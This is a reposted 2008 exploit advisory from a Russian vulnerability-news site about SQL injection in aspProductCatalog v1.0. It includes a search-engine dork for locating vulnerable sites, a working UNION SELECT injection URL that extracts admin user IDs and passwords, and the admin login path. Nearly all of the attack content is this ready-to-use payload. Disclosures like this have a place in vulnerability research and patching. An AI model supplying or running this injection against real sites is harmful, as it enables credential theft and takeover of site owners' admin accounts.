Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Max's Guestbook (XSS) Remote Vulnerability

  Meta Cart Free Database Disclosure

  facto Database Disclosure

  ASP-CMS v.1.0 Sql Injection/Database Disclosure

From:r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date:14 декабря 2008 г.
Subject:aspProductCatalog Sql Injection

#################################################################################
####
####                     aspProductCatalog Sql Injection                         ####
#################################################################################
####
#                                                                                  
 #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
#################################################################################
####
#                                                                                  
 #
#Download : http://heanet.dl.sourceforge.net/sourceforge/aspprocatalog/aspProductCatalogv1.0.
zip

#                                                                                  
 #
#DORK : "Powered by ASP Product Catalog" inurl:default.asp                          #
#                                                                                  
 #
#################################################################################
####
#                                 [Sql Injection]                                   #
#                                                                                  
 #
#http://Site/default.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin  #
#                                                                                  
 #
#################################################################################
####
#                                  [Admin Panel]                                    #
#                                                                                  
 #
#http://Site/admin/login.asp                                                        #
#                                                                                  
 #
#################################################################################
####
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород